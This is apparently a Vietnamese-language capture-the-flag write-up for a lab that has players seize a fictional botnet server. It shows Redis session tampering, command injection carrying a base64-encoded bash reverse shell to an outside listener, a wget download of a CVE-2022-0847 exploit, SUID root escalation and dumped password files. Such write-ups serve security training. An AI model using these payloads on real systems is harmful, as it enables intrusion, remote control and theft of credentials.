Bot Busters Lab
Bot Busters Lab
Get ready for an exciting mission! You need to join an operation to complete a critical mission to detect a botnet group lurking in the dark corners of the cyber world. Recent cyber intelligence reports indicate that a group behind several DDoS attacks in the past is planning to launch several DDoS attacks in the near future. Many companies, institutions and organizations are known to be targeted. As a result of the analysis and research, a server used by the attackers was identified. It is thought that a botnet network is used through this server. We will reach the exact result after your research. You will start your mission to uncover these attackers who have caused many services to collapse and chaos to reign. In order to stop the cyber attackers behind these botnet attacks, you will first need to take over their botnet site and server. This will stop the attacks and identify who their targets are. This exciting mission will require the highest level of strategy and speed to use your technical knowledge to stop the cyber attack. Your courage, intelligence and skills will be the keys to combating the insidious threats of the cyber world.
What is the username of the developer of the website?
- Trước hết hãy scan mục tiêu bằng Nmap :
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- blackbot.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-11 06:22 CST
Nmap scan report for blackbot.hv (172.20.22.183)
Host is up (0.00037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9b:06:14:bb:07:6e:8e:a6:44:a5:e4:3f:8b:10:c4:f3 (RSA)
| 256 59:dc:c1:cc:da:04:83:fa:10:7d:97:49:48:0d:03:6a (ECDSA)
|_ 256 c3:23:40:a0:9b:22:71:19:87:4e:4d:7e:50:bf:21:24 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-title: Login - BlackBot
|_Requested resource was /login
6379/tcp open redis Redis key-value store 6.2.12
MAC Address: 52:54:00:55:EB:CE (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.71 seconds
┌─[root@hackerbox]─[~]
└──╼ #- kết quả của nmap cho thấy trên server có chạy redis , đây là 1 database mã nguồn mở .
- Tôi tạo 1 tài khoản , khi login vô thì thấy chức năng attack panel . vô chức năng này thì thấy trường nhập địa chỉ ip và kiểu tấn công , nhưng điều bắt buộc là phải tài khoản premium mới dùng được chức năng này .
- Truy cập vào redis và nó không được bảo vệ bằng mật khẩu : Tìm thấy session cookie trong Redis database . Thay đổi trực tiếp giá trị isAdmin và isPremium từ false → true
┌─[root@hackerbox]─[~]
└──╼ #redis-cli -h blackbot.hv
blackbot.hv:6379> info keyspace
# Keyspace
db0:keys=1,expires=0,avg_ttl=0
blackbot.hv:6379> select 0
OK
blackbot.hv:6379> keys *
1) "401cdc07-1c3a-4fb8-904b-120b8d4c667a"
blackbot.hv:6379> get 401cdc07-1c3a-4fb8-904b-120b8d4c667a
"{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":false,\"isPremium\":false}"
blackbot.hv:6379> - Tôi chỉnh sửa 1 chút để ta có quyền admin và trở thành tài khoản premium :V
blackbot.hv:6379> set "401cdc07-1c3a-4fb8-904b-120b8d4c667a" "{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":true,\"isPremium\":true}"
OK
blackbot.hv:6379> get "401cdc07-1c3a-4fb8-904b-120b8d4c667a"
"{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":true,\"isPremium\":true}"
blackbot.hv:6379> - Khi đã có quyền admin và lên được premium account , tôi thử cho nó attack localhost (127.0.0.1)
- Dùng burp suite để xem request thì thấy trong phần data như sau :
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1&type=tcp-syn-flood- ta có thể command injection vào truy vấn target .
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1%26sleep${IFS}5s&type=tcp-syn-flood- %26 chính là kí tự & , giữa 2 câu lệnh , nếu có & ngăn cách thì sẽ thực thi ngầm câu lệnh trước và thực thi câu lệnh thứ 2 mà không cần chờ câu lệnh thứ 1 .
- ${IFS} chính là biến môi trường trong linux , dùng để tách các command , nó có mặc định là space hoặc newline .
- Khi injection thì như mục đích , server mấy 5s để phản hồi lại .
- Ta có thể lấy shell từ đây :>>
- Tôi dùng payload như sau :
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1%26echo${IFS}'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMC4yMi4xMjQvODg4OCAwPiYx'|base64${IFS}-d|bash&type=tcp-syn-flood- Giải thích về payload :
┌─[root@hackerbox]─[~]
└──╼ #echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMC4yMi4xMjQvODg4OCAwPiYx" | base64 -d
/bin/bash -i >& /dev/tcp/172.20.22.124/8888 0>&1Trước đó phải mở lắng nghe ở cổng 8888 nhé !
- Sau khi gửi payload thì ta đã có 1 shell , Tôi đọc file main.go thì biết được tác giả của trang web này , đây cũng là đáp án cho câu hỏi này:
┌─[root@hackerbox]─[~]
└──╼ #nc -lvp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.20.22.183.
Ncat: Connection from 172.20.22.183:37090.
bash: cannot set terminal process group (693): Inappropriate ioctl for device
bash: no job control in this shell
blackbot@comet:~/blackbot/cmd$
blackbot@comet:~/blackbot/cmd$ whoami
whoami
blackbot
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
main.go
blackbot@comet:~/blackbot/cmd$ cat main.go
cat main.go
package main
import (
"blackbot/internal/app"
)
func main() {
app.Run()
}
// Developer: @conjurer
blackbot@comet:~/blackbot/cmd$ ==> The Answer : @conjurer
What is the email address of the user with the admin role of the website?
- Tôi tìm file database của trang web này bằng cách :
blackbot@comet:~/blackbot/cmd$ find / -name "*.db" 2>/dev/null
find / -name "*.db" 2>/dev/null
/home/blackbot/blackbot/internal/storage/database/database.db
/var/cache/dictionaries-common/hunspell.db
/var/cache/dictionaries-common/wordlist.db
/var/cache/dictionaries-common/aspell.db
/var/cache/dictionaries-common/ispell.db
/var/cache/man/tr/index.db
/var/cache/man/ja/index.db
/var/cache/man/fr/index.db
/var/cache/man/pt/index.db
/var/cache/man/cs/index.db
/var/cache/man/hu/index.db
/var/cache/man/ru/index.db
/var/cache/man/zh_CN/index.db
/var/cache/man/sv/index.db
/var/cache/man/it/index.db
/var/cache/man/ko/index.db
/var/cache/man/de/index.db
/var/cache/man/da/index.db
/var/cache/man/sr/index.db
/var/cache/man/zh_TW/index.db
/var/cache/man/ro/index.db
/var/cache/man/pt_BR/index.db
/var/cache/man/sl/index.db
/var/cache/man/fi/index.db
/var/cache/man/es/index.db
/var/cache/man/uk/index.db
/var/cache/man/index.db
/var/cache/man/id/index.db
/var/cache/man/nl/index.db
/var/cache/man/pl/index.db
/usr/sbin/tcptraceroute.db
/usr/bin/traceproto.db
/usr/bin/lft.db
/usr/bin/traceroute6.db
/usr/bin/traceroute.db
/usr/lib/firmware/regulatory.db- Kết quả là có 1 file database liên quan tới blackbot. Tôi đọc nó và thấy được đáp án cho câu hỏi này .
blackbot@comet:~/blackbot/cmd$ cat /home/blackbot/blackbot/internal/storage/database/database.db
<kbot/blackbot/internal/storage/database/database.db
�QLite format 3@ $ ._
tai,/o%11�otablesqlb_y1�[tablesqlb_temp_table_11sqlb_temp_table_11CREATE TABLE "sqlb_temp_table_11" (
"id" TEXT NOT NULL,
"username" TEXT NOT NULL UNIQUE,
"email" TEXT NOT NULL UNIQUE,
"password" TEXT NOT NULL,
"is_admin" BOOLEAN NOT NULL,
"is_premium" BOOLEAN NOT NULL,
PRIMARY KEY("id")
)
W1indexsqlite_autoindex_sqlb_temp_table_11_3sqlb_temp_table_11 �W1indexsqlite_autoindex_sqlb_temp_table_11_2sqlb_temp_table_1�W1indexsqlite_autoindex_sqlb_temp_table_11_1sqlb_temp_table_11�),=in)0=indexsqlite_autoindex_users_3users )/=indexsqlite_autoindex_users_2user).=indexsqlite_autoindex_users_1users�q-�AtableusersusersCREATE TABLE "users" (
"id" TEXT NOT NULL,
"username" TEXT NOT NULL UNIQUE,
"email" TEXT NOT NULL UNIQUE,
"password" TEXT NOT NULL,
"is_admin" BOOLEAN NOT NULL,
"is_premium" BOOLEAN NOT NULL,
PRIMARY KEY("id")
)
�q8b61ae99-cca5-4a6f-bbbf-7acce2021a6dkai0kidkai0kid@gmail.com$2a$14$gacNsQBamV4feXmB431FOeLdh4ts2wjojGjAOAWmu0JKsg02lMeiG�
UC� 71719fd7-c694-4066-ab9a-b41d330c6d43notoriousnotorious.hackerz@gmail.com$2a$14$EaH/vHO2TK6dvxj84veaQ.g1ka6MtPmujPtUj/qJNAxgzMg/fT7oa
���
ai0kid
notorious
���/kai0kid@gmail.comC notorious.hackerz@gmail.com
���(U8b61ae99-cca5-4a6f-bbbf-7acce2021a6d'U 71719fd7-c694-4066-ab9a-b41d330c6d43blackbot@comet:~/blackbot/cmd$ ==> The Answer : notorious.hackerz@gmail.com
What is the CVE code of the vulnerability that can be used for privilige escalation?
- Tôi kiểm tra phiên bản hệ thống :
blackbot@comet:~/blackbot/cmd$ uname -a
uname -a
Linux comet 5.11.0-051100-generic #202102142330 SMP Sun Feb 14 23:33:21 UTC 2021 x86_64 GNU/Linux
blackbot@comet:~/blackbot/cmd$ Thông tin về lỗ hổng: CVE: CVE-2022-0847 Mô tả: Lỗ hổng trong Linux kernel cho phép ghi đè file read-only Ảnh hưởng: Linux kernel 5.8 đến 5.16.11, 5.15.25, 5.10.102
==> The Answer : CVE-2022-0847
What is the phone number of the attackers?
- Như ở câu hỏi trước , tôi sẽ dùng cve-2022-0847 để leo thang đặc quyền , tôi tải payload(exploit-2) về thành 1 file k.c , sau đó tôi mở http server để chuyển file exploit .c này sang máy nạn nhân :
┌─[root@hackerbox]─[~]
└──╼ #nano k.c
┌─[root@hackerbox]─[~]
└──╼ #python3 -m http.server 88
Serving HTTP on 0.0.0.0 port 88 (http://0.0.0.0:88/) ...- Sau đó trên máy nạn nhân tôi tải nó về bằng wget , rồi compile nó ra file thực thi và thêm quyền thực thi cho nó .
blackbot@comet:~/blackbot/cmd$ wget http://172.20.19.90:88/k.c
wget http://172.20.19.90:88/k.c
--2025-11-11 11:16:14-- http://172.20.19.90:88/k.c
Connecting to 172.20.19.90:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7752 (7.6K) [text/x-csrc]
Saving to: ‘k.c’
0K ....... 100% 179M=0s
2025-11-11 11:16:14 (179 MB/s) - ‘k.c’ saved [7752/7752]
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
k.c
main.go
blackbot@comet:~/blackbot/cmd$ gcc -o e k.c
gcc -o e k.c
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
e
k.c
main.go
blackbot@comet:~/blackbot/cmd$ chmod +x e
chmod +x e- Để dùng được exploit này tôi cần tìm 1 file có bật bit suid . tôi tìm nó và leo thang như sau :
blackbot@comet:~/blackbot/cmd$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
blackbot@comet:~/blackbot/cmd$ ./e /usr/bin/passwd
./e /usr/bin/passwd
whoami
root
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@comet:/home/blackbot/blackbot/cmd#
- Khi đã có root , tôi tìm đến /root và đọc file secret.txt
root@comet:/# cd root
cd root
root@comet:/root# ls
ls
secret.txt targets.txt
root@comet:/root# cat secret.txt
cat secret.txt
root:rqmTPUHH42X7PgArJbHLvfdm
blackbot:hzacsrVawKfMu4CChQvF7drh
paradox:mn9adH8xvdVjMaYmPdwSmrhH
URL: darkwebbotnet.com
Username: ShadowBotMaster
Password: Ph4nt0mC0mm4nd
URL: cyberhackerzforum.org
Username: StealthScripter
Password: Z3r0C00lH@ck
URL: dsmplkwtzrxy.com
Phone: +1(555)123-4567
Password: X9s#4@2hT*
URL: malwaremafia.net
Username: InfectedCoder
Password: M@lwareK1ngP1n
root@comet:/root#
==> The Answer : +1(555)123-4567
What are any of the addresses targeted by the attackers?
- Đọc file targets.txt
root@comet:/root# ls
ls
secret.txt targets.txt
root@comet:/root# cat tar*
cat tar*
examplecorp.com
fakesolutions.net
bogusindustries.org
fictitiousbiz.co
phonyenterprises.biz
fakeglobal.net
imposterco.io
nonexistentcorp.net
hackerlogistics.org
pretendventures.org
unrealtech.com
root@comet:/root# ==> The Answer : unrealtech.com